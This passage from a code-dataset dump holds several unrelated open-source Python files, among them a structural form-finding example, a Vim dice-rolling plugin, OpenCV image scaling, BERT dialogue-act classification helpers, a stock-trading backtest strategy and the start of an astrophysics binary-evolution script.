compas_cem.elements import TrailEdge\n from compas_cem.elements import DeviationEdge\n\n from compas_cem.loads import NodeLoad\n\n from compas_cem.supports import NodeSupport\n\n from compas_cem.equilibrium import static_equilibrium\n\n from compas_cem.optimization import Optimizer\n from compas_cem.optimization import DeviationEdgeParameter\n from compas_cem.optimization import TrailEdgeParameter\n\n from compas_cem.optimization import PointConstraint\n\n from compas_cem.plotters import Plotter\n\n # create a topology diagram\n topology = TopologyDiagram()\n\n # add nodes\n topology.add_node(Node(0, [0.0, 0.0, 0.0]))\n topology.add_node(Node(1, [1.0, 0.0, 0.0]))\n topology.add_node(Node(2, [2.0, 0.0, 0.0]))\n topology.add_node(Node(3, [3.0, 0.0, 0.0]))\n\n # add edges with negative values for a compression-only structure\n topology.add_edge(TrailEdge(0, 1, length=-1.0))\n topology.add_edge(DeviationEdge(1, 2, force=-1.0))\n topology.add_edge(TrailEdge(2, 3, length=-1.0))\n\n # add supports\n topology.add_support(NodeSupport(0))\n topology.add_support(NodeSupport(3))\n\n # add loads\n topology.add_load(NodeLoad(1, [0.0, -1.0, 0.0]))\n topology.add_load(NodeLoad(2, [0.0, -1.0, 0.0]))\n\n # calculate equilibrium\n topology.build_trails()\n form = static_equilibrium(topology)\n\n # optimization\n optimizer = Optimizer()\n\n optimizer.add_parameter(OriginNodeYParameter(1, 1.0, 1.0))\n optimizer.add_parameter(DeviationEdgeParameter((1, 2), 1.0, 1.0))\n optimizer.add_parameter(TrailEdgeParameter((2, 3), 1.0, 1.0))\n\n point_a = Point(1.0, -0.5, 0.0)\n optimizer.add_constraint((PointConstraint(1, point_a)))\n\n point_b = Point(3.0, -0.707, 0.0)\n optimizer.add_constraint((PointConstraint(3, point_b)))\n\n # optimize\n eps = 1e-6\n cform = optimizer.solve(topology, \"LBFGS\", eps=eps, verbose=True)\n assert optimizer.penalty <= eps\n\n # plot\n plotter = Plotter()\n\n plotter.add(form)\n plotter.add(point_b, facecolor=(0, 1, 0))\n plotter.add(point_a, facecolor=(1, 0, 0))\n plotter.add(cform, show_edgetext=True, edgetext=\"forcelength\")\n\n plotter.zoom_extents()\n plotter.show()\n","repo_name":"arpastrana/compas_cem","sub_path":"src/compas_cem/optimization/parameters/origin.py","file_name":"origin.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"61"} +{"seq_id":"33006247723","text":"\"\"\"\nMost functions in here when used in vim, expect vim functions to have argument named args\n\"\"\"\n\nimport rpgdieroller.dierolls as rpgroller\nimport rpgdieroller.oracles as oracles\nimport vim\nimport sys\n\n\ndef _helper():\n args = vim.eval(\"a:args\")\n print(args)\n rpgroller.disable_term_formatting()\n cur_col = vim.current.window.cursor[0]\n return args, cur_col\n\n\ndef _update_cursor(shift):\n pos = vim.current.window.cursor\n pos = (pos[0] + shift, pos[1])\n vim.current.window.cursor = pos\n\n\ndef roll():\n args, cur_col = _helper()\n lines = []\n lines.append(\"# Dice Roll:\")\n lines.append(\"# \" + rpgroller.dierollexpr(args))\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef rollcountsuccess():\n args, cur_col = _helper()\n arglist = args.split(\" \")\n if len(arglist) != 3:\n print(\n f\"Error: must use 3 int arguments: \",\n file=sys.stderr,\n )\n return\n n_dice = arglist[0]\n n_sides = arglist[1]\n n_for_success = arglist[2]\n try:\n n_dice = int(n_dice)\n except ValueError:\n print(\n f\"Error: 1st arg n_dice must be convertable to int, not '{n_dice}'\",\n file=sys.stderr,\n )\n return\n try:\n n_sides = int(n_sides)\n except ValueError:\n print(\n f\"Error: 1st arg n_sides must be convertable to int, not '{n_sides}'\",\n file=sys.stderr,\n )\n return\n try:\n n_for_success = int(n_for_success)\n except ValueError:\n print(\n f\"Error: 1st arg n_for_success must be convertable to int, not '{n_for_success}'\",\n file=sys.stderr,\n )\n return\n rpgroller.disable_term_formatting()\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Count Successful Die Rolls:\")\n lines.append(\"# \" + rpgroller.rollcountsuccess(n_dice, n_sides, n_for_success))\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef rollfate():\n args, cur_col = _helper()\n lines = []\n lines.append(\"# Fate Dice Roll:\")\n lines.append(\"# \" + rpgroller.fateroll(args))\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef ironswornaction():\n args, cur_col = _helper()\n lines = []\n lines.append(\"# Ironsworn Action Roll:\")\n lines.append(\"# \" + rpgroller.ironswornaction(args))\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef ironswornprogress():\n n_progress = vim.eval(\"a:args\")\n print(n_progress)\n try:\n n_progress = int(n_progress)\n except ValueError:\n print(\n f\"Error: argument must be convertable to a single int not '{n_progress}'\",\n file=sys.stderr,\n )\n return\n rpgroller.disable_term_formatting()\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn Progress Roll:\")\n lines.append(\"# \" + rpgroller.ironswornprogress(n_progress))\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef OracleYesNo():\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Simple oracle roll:\")\n lines.append(\"# \" + oracles.OracleYesNo())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef IronswornPayThePrice():\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn pay the price:\")\n lines.append(\"# \" + oracles.IronswornPayThePrice())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef IronswornCharacterOracle():\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn character oracle:\")\n lines.append(\"# \" + oracles.IronswornCharacter())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef IronswornActionThemeOracle():\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn action-theme oracle:\")\n lines.append(\"# \" + oracles.IronswornActionTheme())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef IronswornLocationOracle():\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn location oracle:\")\n lines.append(\"# \" + oracles.IronswornLocation())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef IronswornSettlementOracle():\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn settlement oracle:\")\n lines.append(\"# \" + oracles.IronswornSettlement())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef IronswornCombatActionOracle():\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn combat action oracle:\")\n lines.append(\"# \" + oracles.IronswornCombatAction())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef IronswornChallengeRankOracle():\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn challenge rank oracle:\")\n lines.append(\"# \" + oracles.IronswornChallengeRank())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef IronswornMysticBacklashOracle():\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn mystic backlash oracle:\")\n lines.append(\"# \" + oracles.IronswornMysticBacklash())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef IronswornMajorPlotTwistOracle():\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn major plot twist oracle:\")\n lines.append(\"# \" + oracles.IronswornMajorPlotTwist())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n","repo_name":"jhugon/rpgdieroller","sub_path":"rpgdieroller/vim.py","file_name":"vim.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1655328122","text":"# 画像処理編\n# 6. アフィン変換により、画像を拡大縮小するプログラム\n\nimport cv2\nimport numpy as np\n\nimg = cv2.cvtColor(cv2.imread(\"../../data/Lenna.jpg\"), cv2.COLOR_BGR2GRAY)\n\nheight, width = img.shape[:2]\nratio = 2.0 # 画像を2倍に拡大する\n\n# アフィン変換を計算\n# src: Coordinates of triangle vertices in the source image.\n# dst: Coordinates of the corresponding triangle verices in the destination image.\nsrc = np.array([[0.0, 0.0], [0.0, 1.0], [1.0, 0.0]], np.float32)\naffine = cv2.getAffineTransform(src = src, dst = src * ratio)\n\n# アフィン変換を画像に適用\n# dsize: size of the output image.\n# flags で補間方法を指定できる\nresized_img = cv2.warpAffine(src = img, M = affine, dsize = (int(ratio) * height, int(ratio) * width), flags = cv2.INTER_LANCZOS4)\n\ncv2.imwrite(\"../../data/image-processing-chap/ip_6.jpg\", resized_img)\n","repo_name":"Kobamiyannnn/image-processing-with-opencv","sub_path":"src/image-processing-chap/6_img_scaling_by_affine_transformation.py","file_name":"6_img_scaling_by_affine_transformation.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28097274859","text":"class Solution:\n # @param A : tuple of integers\n # @return an integer\n def lis(self, A):\n n = len(A)\n dp = [0] * n\n dp[0] = 1\n # dp[1] = 1\n print(dp)\n print()\n\n for i in range(1, n):\n dp[i] = 1\n\n for j in range(i):\n if A[j] < A[i] and dp[j]+1 > dp[i]:\n dp[i] = dp[j] + 1\n print(dp)\n\n return max(dp)\n\n\nif __name__ == '__main__':\n a = [0, 8, 4, 12, 2, 10] # 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]\n obj = Solution()\n ans = obj.lis(a)\n print(f'ans is {ans}')\n","repo_name":"navkant/ds_algo_practice","sub_path":"scaler/dynamic_programming/llis.py","file_name":"llis.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23449912561","text":"fp = r\"C:\\Yam\\input.txt\"\r\nofp = r\"C:\\Yam\\output.txt\"\r\nwith open(fp, 'rb') as reader:\r\n content = reader.read().splitlines()\r\nwriter = open(ofp, 'wb')\r\n\r\ntests = int(content[0])\r\nreader = 1\r\nwhile reader <= tests:\r\n line = content[reader]\r\n ##################\r\n line = line.split()\r\n length, crowd = int(line[0]), line[1]\r\n crowd = crowd[:length+1]\r\n shy = 0\r\n standing = 0\r\n attending = 0\r\n while shy < len(crowd):\r\n if int(crowd[shy]) > 0:\r\n attending += max(0, shy-(standing+attending))\r\n standing += int(crowd[shy])\r\n print(crowd, shy, standing, attending)\r\n shy += 1\r\n ##################\r\n writer.write(\"Case #{x}: {y}\\n\".format(x=reader, y=attending))\r\n reader += 1\r\n \r\nwriter.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/1723.py","file_name":"1723.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25072254252","text":"import logging\nimport os\nfrom typing import List, Optional, Union\nfrom transformers.data import DataProcessor, InputExample, InputFeatures, SingleSentenceClassificationProcessor\nfrom sklearn.metrics import f1_score, accuracy_score\nfrom transformers import (\n PreTrainedTokenizer,\n glue_compute_metrics,\n glue_output_modes,\n glue_processors\n)\nlogger = logging.getLogger(__name__)\n\ndef convert_examples_to_features(\n examples: List[InputExample],\n tokenizer: PreTrainedTokenizer,\n max_length: Optional[int] = None,\n task=None,\n label_list=None,\n output_mode=None,\n):\n if max_length is None:\n max_length = tokenizer.max_len\n\n if task is not None:\n processor = processors[task]()\n if label_list is None:\n label_list = processor.get_labels()\n logger.info(\"Using label list %s for task %s\" % (label_list, task))\n if output_mode is None:\n output_mode = output_modes[task]\n logger.info(\"Using output mode %s for task %s\" % (output_mode, task))\n\n label_map = {label: i for i, label in enumerate(label_list)}\n\n def label_from_example(example: InputExample) -> Union[int, float]:\n if output_mode == \"classification\":\n return label_map[example.label]\n elif output_mode == \"regression\":\n return float(example.label)\n raise KeyError(output_mode)\n\n labels = [label_from_example(example) for example in examples]\n\n batch_encoding = tokenizer.batch_encode_plus(\n [(example.text_a, example.text_b) for example in examples],\n max_length=max_length, padding=True, truncation=True, return_token_type_ids=True\n )\n\n features = []\n print(range(len(examples)))\n\n for i in range(len(examples)):\n inputs = {k: batch_encoding[k][i] for k in batch_encoding}\n feature = InputFeatures(**inputs, label=labels[i])\n features.append(feature)\n\n for i, example in enumerate(examples[:2]):\n logger.info(\"*** Example ***\")\n logger.info(\"guid: %s\" % (example.guid))\n logger.info(\"features: %s\" % features[i])\n\n return features\n\nclass SentenceDataProcessor(DataProcessor):\n def get_train_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\"\"\n return self._create_examples(self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\")\n\n def get_dev_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\"\"\n return self._create_examples(self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\")\n\n def get_test_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\"\"\n return self._create_examples(self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\")\n\n def get_labels(self):\n return NotImplementedError\n\n def _create_examples(self, lines, set_type):\n examples = []\n for (i, line) in enumerate(lines):\n guid = \"%s-%s\" % (set_type, i)\n text_a = line[0]\n label = line[1]\n examples.append(InputExample(guid=guid, text_a=text_a, text_b=None, label=label))\n return examples\n\n# monkey-patch all glue classes to have test examples\ndef get_test_examples(self, data_dir):\n return self._create_examples(self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\")\n\nfor task in glue_processors:\n\n processor = glue_processors[task]\n processor.get_test_examples = get_test_examples\n\n\nclass flProcessor(SentenceDataProcessor):\n def get_labels(self):\n labels = ['RS', 'S', 'Q', 'A', 'PF', 'ACK', 'RF', 'NF', 'C', 'H', 'DIR', 'RC', 'LF']\n # labels = ['A', 'ACK', 'C', 'DIR', 'H', 'LF', 'NF', 'PF', 'Q', 'RC', 'RF', 'S']\n\n return labels\n\nclass slProcessor(SentenceDataProcessor):\n def get_labels(self):\n labels = ['ACK', 'AEX', 'AR', 'AWH', 'AYN', 'C', 'DIR', 'E', 'FNU', 'FU',\n 'GRE', 'HI', 'I', 'LF', 'NF', 'O', 'OEX', 'PF', 'QD', 'QEX', 'QF',\n 'QI', 'QO', 'QP', 'QQ', 'QR', 'R', 'RC', 'RF', 'RFI']\n\n return labels\n\nprocessors = glue_processors.copy()\nprocessors.update(\n {\"firstlevel\":flProcessor, \"secondlevel\": slProcessor}\n)\nprint(processors)\noutput_modes = glue_output_modes\noutput_modes.update(\n {\"firstlevel\":\"classification\", \"secondlevel\":\"classification\"}\n)\n\ndef compute_metrics(task_name, preds, labels):\n assert len(preds) == len(labels)\n if task_name in [\"firstlevel\", \"secondlevel\"]:\n return {\"f1\":f1_score(y_true=labels, y_pred=preds, average=\"weighted\"), \"acc\": accuracy_score(y_true=labels, y_pred=preds)}\n elif task_name in glue_processors:\n return glue_compute_metrics(task_name, preds, labels)\n else:\n raise NotImplementedError\n\n","repo_name":"bertDA/BertDA","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4669,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"18685002582","text":"import math\nfrom os import curdir\nimport yfinance as yf\nimport time\nimport datetime\nimport matplotlib.pyplot as plt\n\nEPSILON = 0.000000001\nclass Strategy:\n\n\tdef __init__(self, stockData, budget, splitCount, profitRate, buyOnRiseRatio, delayTrade = 0, buyMoreUnderLossRatio = 0.00, logTrade = True, minimumLosscutRate = 1.0, name = ''):\n\t\tself.days_buy_lock = 0\n\t\tself.name = name\n\t\tself.budget = budget\n\t\tself.lastBalance = budget \n\t\tself.snapshotBalance = budget\n\t\tself.splitCount = splitCount\n\t\tself.profitRate = profitRate\n\t\tself.buyOnRiseRatio = buyOnRiseRatio\n\t\tself.stockData = stockData\n\t\tself.openPrices = stockData['Open']\n\t\tself.closePrices = stockData['Close']\n\t\tself.highPrices = stockData['High']\n\t\tself.lowPrices = stockData['Low']\n\t\tself.stockData['Date'] = stockData.index\n\t\tself.logTrade = logTrade\n\t\tself.minimumLosscutRate = minimumLosscutRate\n\t\tself.profitSellAmountRateAtOnce = 1\n\t\tself.lossSellAmountRateAtOnce = 1\n\n\t\tself.stockCount = 0\n\t\tself.breakEvenPrice = 0\n\t\tself.balanceHistory = []\n\t\tself.assetValueHistory = []\n\t\tself.delayTrade = delayTrade\n\t\tself.sellFee = 0.25/100\n\t\tself.buyFee = 0.25/100\n\t\tself.buyMoreUnderLossRatio = buyMoreUnderLossRatio\n\t\tself.score = 0\n\t\tself.recentScoreWeight = 1.0\n\t\tself.lastScore = 0\n\t\tself.scoreHistory = []\n\t\tself.trade_locked = False\n\t\tself.curBuyProgress = 0\n\t\tself.buyAmountUnit = self.budget / self.splitCount\n\t\tself.on_buy = 0 # fn(dayIndex, price, count)\n\t\tself.on_sell = 0 # fn(dayIndex, price, count)\n\n\tdef set_on_buy_fn(self, func):\n\t\tself.on_buy = func # fn(dayIndex, price, count)\n\n\tdef set_on_sell_fn(self, func):\n\t\tself.on_sell = func # fn(dayIndex, price, count)\n\t\n\n\tdef _buy_close(self, dayIndex, money) :\n\t\t#print(money)\n\t\tif(self.budget <= EPSILON):\n\t\t\treturn False\n\n\t\tif(self.budget - money < EPSILON):\n\t\t\treturn False\n\n\t\trecentPrice = self.closePrices[dayIndex - 1]\n\t\tcostPerStock = (recentPrice * (1.0 + self.buyFee))\n\t\tcount = (money / costPerStock)\n\t\tif count <= EPSILON:\n\t\t\treturn False\n\n\n\t\tprice = self.closePrices[dayIndex]\n\t\tself.breakEvenPrice = ( ( self.stockCount * self.breakEvenPrice ) + (count * price ) ) / (self.stockCount + count)\n\t\tself.stockCount += count\n\n\t\tif( count > 0):\n\t\t\tself.on_buy(dayIndex, price, count)\n\n\t\tif(self.budget == 0.):\n\t\t\tassert(0)\n\n\t\tself.budget -= (price * count) \n\n\t\tif(math.fabs(self.budget) < EPSILON):\n\t\t\tself.budget = 0\n\n\n\n\t\t#print(\"[BUY ] self.budget(%d) Count(%d) Mean(%f) BUY(%f)\" % (self.budget, self.stockCount, self.breakEvenPrice, close_value))\n\n\t\treturn True\n\t\n\tdef is_tradable(self, dayIndex):\n\t\tif(dayIndex < self.delayTrade):\n\t\t\treturn False\n\n\t\tsize = self.closePrices.size\n\t\tif dayIndex >= size:\n\t\t\treturn False\n\t\t\n\t\treturn True\n\n\t\n\tdef is_take_profit_condition(self, dayIndex, profitRate):\n\t\treturn self.breakEvenPrice * profitRate < float(self.highPrices[dayIndex])\n\n\tdef calc_balance(self, dayIndex):\n\t\treturn self.closePrices[dayIndex] * self.stockCount + self.budget\n\n\tdef sell_all_when_done(self, dayIndex ):\n\t\tprice_and_count = (0, 0)\n\t\tsold = 0\n\t\tsoldCount = 0\n\t\tif self.is_tradable(dayIndex) == False: return price_and_count\n\n\t\tif( self.stockCount == 0 ):\n\t\t\treturn price_and_count\n\n\t\tif(math.fabs(self.splitCount - self.curBuyProgress) <= EPSILON):\n\t\t\tself.curBuyProgress = self.splitCount\n\n\t\tassert(self.splitCount - self.curBuyProgress >= 0 )\n\n\t\tprogressRatio = self.curBuyProgress / self.splitCount\n\t\t#progressRatio = 1\n\t\tsellAmountRate = 0\n\n\t\tif(self.budget - self.buyAmountUnit <= 0):\n\t\t\t#if self.is_take_profit_condition(dayIndex, self.minimumLosscutRate) : # losscut\n\t\t\t\tprice = self.closePrices[dayIndex] \n\t\t\t\tsellAmountRate = self.lossSellAmountRateAtOnce\n\t\t\t\tsoldCount = self.stockCount * sellAmountRate\n\t\t\t\tsold = (soldCount * price)\n\t\t\t\tprice_and_count = (price, soldCount)\n\n\t\telif self.is_take_profit_condition(dayIndex, self.profitRate) : # take profit\n\t\t\tprice = self.breakEvenPrice * self.profitRate\n\t\t\t#sellAmountRate = self.profitSellAmountRateAtOnce * (0.5 + (progressRatio * progressRatio)*0.5)\n\t\t\tsellAmountRate = self.profitSellAmountRateAtOnce\n\t\t\tsoldCount = self.stockCount * sellAmountRate \n\t\t\tsold = soldCount * price\n\t\t\tprice_and_count = (price, soldCount)\n\n\t\tif sold > 0:\n\t\t\tself.budget += sold * (1.0 - self.sellFee)\n\t\t\tself.curBuyProgress *= (1.0 - sellAmountRate)\n\t\t\tself.stockCount -= soldCount\n\t\t\tself.lastBalance = self.calc_balance(dayIndex)\n\t\t\tself.buyAmountUnit = self.lastBalance / self.splitCount\n\t\t\t\n\t\t\tself.on_sell(dayIndex, price_and_count[0], price_and_count[1])\n\t\t\n\n\t\treturn price_and_count\n\t\n\t\n\t\n\tdef lock_trade(self):\n\t\tself.trade_locked = True\n\n\tdef is_trade_locked(self):\n\t\treturn self.trade_locked\n\n\tdef unlock_trade(self):\n\t\tself.trade_locked = False \n\n\tdef fill_budget(self, money):\n\t\tassetValue = self.lastBalance - self.budget\n\t\tself.budget += money\n\t\tself.lastBalance += money\n\t\tself.curBuyProgress = self.splitCount * assetValue / self.lastBalance\n\t\tself.buyAmountUnit = self.lastBalance / self.splitCount\n\n\tdef transfer_budget(self, desiredMoney):\n\t\ttransfered = 0\n\t\tif(self.budget > desiredMoney):\n\t\t\ttransfered = desiredMoney\n\t\telse:\n\t\t\ttransfered = self.budget\n\n\t\tself.budget -= transfered\n\t\tself.lastBalance -= transfered\n\t\tif(self.budget < 0):\n\t\t\tassert(0)\n\n\t\treturn transfered\n\n\tdef reserve_budget_at_close(self, dayIndex, desiredReserve):\n\n\t\tif(dayIndex == 0):\n\t\t\treturn 0\n\n\t\tif(desiredReserve <= self.budget): # already reserved\n\t\t\treturn desiredReserve\n\n#--------------------------------------------------------------------------------\n#\tcalc count by recentPrice\n#--------------------------------------------------------------------------------\n\t\trecentPrice = self.closePrices[dayIndex-1]\n\t\tcount = desiredReserve / recentPrice\n\t\tif(self.stockCount < count):\n\t\t\tcount = self.stockCount\n#--------------------------------------------------------------------------------\n\n\t\tself.stockCount -= count\n\t\tself.budget += count * self.closePrices[dayIndex] * (1.0 - self.sellFee);\n\t\tif( count > 0):\n\t\t\tself.on_sell(dayIndex, self.closePrices[dayIndex], count)\n\n\t\tif(desiredReserve <= self.budget): # finally reserved\n\t\t\treturn desiredReserve\n\t\treturn self.budget\n\n\n\tdef post_trade(self, dayIndex):\n\t\tself.assetValueHistory.append(self.stockCount * self.closePrices[dayIndex])\n\t\tself.balanceHistory.append(self.calc_balance(dayIndex))\n\n\tdef buy(self, dayIndex):\n\t\tif(dayIndex == 0):\n\t\t\tself.lastBalance = self.calc_balance(dayIndex)\n\t\t\treturn\n\t\tif( self.budget <= 0):\n\t\t\tself.lastBalance = self.calc_balance(dayIndex)\n\t\t\treturn\n\n\t\tbuyRatio = self.buyOnRiseRatio\n\n\t\topenPrice = float(self.closePrices[dayIndex-1])\n\t\tif self.breakEvenPrice < openPrice * 0.97 :\n\t\t\tif((self.curBuyProgress + buyRatio) >= self.splitCount):\n\t\t\t\tself.lastBalance = self.calc_balance(dayIndex)\n\t\t\t\treturn\n\n\t\t\tsuccess = self._buy_close(dayIndex, self.buyAmountUnit * buyRatio)\n\t\t\tif success == True:\n\t\t\t\tself.curBuyProgress += buyRatio\n\n\t\tbuyRatio = 1.0 - self.buyOnRiseRatio\n\t\tif((self.curBuyProgress + buyRatio) >= self.splitCount):\n\t\t\tself.lastBalance = self.calc_balance(dayIndex)\n\t\t\treturn\n\n\t\tsuccess = self._buy_close(dayIndex, self.buyAmountUnit * buyRatio)\n\t\tif success == True:\n\t\t\tself.curBuyProgress += buyRatio\n\n\n\t\tself.lastBalance = self.calc_balance(dayIndex)\n","repo_name":"quakenroll/infinite_buy","sub_path":"startegy2.py","file_name":"startegy2.py","file_ext":"py","file_size_in_byte":7159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22180991020","text":"import os\nimport numpy as np\nimport time\nimport astropy.units as u\nfrom galpy.potential import evaluatePotentials, KeplerPotential, HernquistPotential, PlummerPotential\nfrom galpy.util import conversion\nfrom binary_evolution import KeplerRing, PointMass\nfrom binary_evolution.tools import ecc_to_vel\n# from flybys3body import scattering_hybrid, scattering_SA\nfrom fortran.flybys3body_fortran import scattering_hybrid, scattering_SA\nfrom amuse.lab import *\nfrom numpy.random import default_rng\n\nimport matplotlib\nfrom matplotlib import pyplot\nfrom matplotlib.ticker import (MultipleLocator, AutoMinorLocator)\n\nG = constants.G\nc = constants.c\nHubbleTime = 1.4e10|units.yr\n_pc = 8000\n_kms = 220\n\ndef isfloat(value):\n\ttry:\n\t\tfloat(value)\n\t\treturn True\n\texcept ValueError:\n\t\treturn False\n\nclass inputParameters:\n\tdef __init__(self, t=1e4, a_out=0.5, e_out=0, inc_out=np.pi/6, m1=5, m2=5, a=1, e=0.05, i=1, Omega=1.5, omega=0, output_file='output.txt', output_file_2='', approximation=0, potential=\"Plummer\", m_total=4e6, b=1, rtol=1e-11, tmax=1e20, relativity=True, tidal_effects=True, gw=True, resume=False, includeEncounters=True, includeWeakEncounters=True, Q_max_a=50, Q_min_a=0, n=10, a_max=1000, sameParameters='', disableKicks=False, t0=0, m_per=1):\n\t\tself.t = t # Integration time [yr] \n\t\tself.a_out = a_out # Outer orbit semi-major axis [pc]\n\t\tself.e_out = e_out # Outer orbit eccentricity\n\t\tself.inc_out = inc_out # Outer orbit inclination\n\t\tself.m1 = m1 # Primary mass [MSun]\n\t\tself.m2 = m2 # Secondatu mass [MSun]\n\t\tself.a = a # Inner orbit semimajor axis [AU]\n\t\tself.e = e # Inner orbit eccentricity\n\t\tself.i = i # Inner orbit inclination\n\t\tself.Omega = Omega # Inner orbit longitude of ascending node\n\t\tself.omega = omega # Inner orbit argument of periapsis\n\t\tself.output_file = output_file # Output file name\n\t\tself.output_file_2 = output_file_2 # Additional output file name\n\t\tself.approximation = approximation # 0 - use precise if epsilon_gr<20 and GR-only otherwise; 1 - always precise; 2 - always GR-only\n\t\tself.potential = potential # Cluster potential\n\t\tself.b = b\n\t\tself.m_total = m_total\n\t\tself.rtol = rtol # Inner orbit integration accuracy\n\t\tself.tmax = tmax # Maximum calculation time [s]\n\t\tself.resume = resume # Resume the integration from the last line in self.output_file (ignores the provided initial conditions)\n\t\tself.includeWeakEncounters = includeWeakEncounters \n\t\tself.Q_max_a = Q_max_a # The maximum pericenter of the encounters to include\n\t\tself.Q_min_a = Q_min_a # The minimum pericenter of the encounters to include\n\t\tself.includeEncounters = includeEncounters \n\t\tself.n = n # The number of points per (approximate) outer orbital period used to interpolate the outer orbit \n\t\tself.relativity = relativity #include GR effects\n\t\tself.tidal_effects = tidal_effects #include tidal terms\n\t\tself.gw = gw #include GW emission\n\t\tself.a_max = a_max #Stop the integration if the inner binary semimajor axis exceeds this value in AU\n\t\tself.sameParameters = sameParameters #if not empty, take the initial conditions from that file (overwritten by resume)\n\t\tself.disableKicks = disableKicks #if True, encounters don't change the binary CM velocity \n\t\tself.t0 = t0 \t#initial time\n\t\tself.m_per = m_per \t#Perturber mass in M_Sun\n\ndef m_final(m):\n\tstellar = SSE()\n\tstellar.parameters.metallicity = 0.001\n\tstellar.particles.add_particle(Particle(mass=m))\n\tstellar.evolve_model(5|units.Gyr)\t\n\tresult = stellar.particles.mass.in_(units.MSun)\n\tstellar.stop()\n\treturn result\n\ndef sample_v_icdf (x, sigma_rel, n=10):\n# x = GM/Q_max/sigma_rel^2\n# u = v/sigma_rel\n\trng = default_rng()\n\trandom_number = rng.random()\n\tcdf1 = 0\n\ti = -1\n\twhile cdf1 < random_number:\n\t\ti += 1\n\t\tu1 = (i+1)/n\n\t\tcdf1 = 1-np.exp(-u1**2/2) - u1**2*np.exp(-u1**2/2)/2/(1+x)\n\tu0 = i/n\n\tcdf0 = 1-np.exp(-u0**2/2) - u0**2*np.exp(-u0**2/2)/2/(1+x)\t\n\tu = u0 + (u1-u0)*(random_number-cdf0)/(cdf1-cdf0)\n\treturn u*sigma_rel\n\ndef sample_v_hamers (sigma_rel, v0):\n# v0 = sqrt(GM/Q_max)\n\trng = default_rng()\n\twhile True:\n\t\tvz = np.sqrt(rng.exponential(2*sigma_rel.value_in(units.kms)**2))|units.kms\n\t\tvx = rng.normal(0, sigma_rel.value_in(units.kms))|units.kms\n\t\tvy = rng.normal(0, sigma_rel.value_in(units.kms))|units.kms\n\t\tv2 = vx**2+vy**2+vz**2\n\t\tif (v2 > 2*v0**2): break\n\treturn np.sqrt(v2 - 2*v0**2)\n\n# m_total = 4e+6\n# b=1\n# pot = TwoPowerTriaxialPotential(amp=16*m_bh*u.solMass, a=4*u.pc, alpha=1, beta=4, c=0.7)\n# pot = PlummerPotential(amp=m_total*u.solMass, b=b*u.pc) \n\n# Q_max_a_default = 50\nQ_hybrid_a = 10\n# m_per = 1|units.MSun\n# m_per_max = m_per\n# sigma = 3|units.kms\n# n = 1e6|units.pc**-3\n\ndef sigma (r, type=\"Plummer\", m_total=4e6, b=1):\n\t# sqrt(2) * one-dimensional velocity dispersion\n\tif type==\"Plummer\": return np.sqrt(G*(m_total|units.MSun)/6/np.sqrt(r**2+(b|units.pc)**2))\n\telif type==\"Hernquist\": \n\t\tx = r/(b|units.pc)\n\t\t# print(x, 12*x*(x+1)**3*np.log(1+1/x) - x/(x+1)*(25+52*x+42*x**2+12*x**3))\n\t\treturn 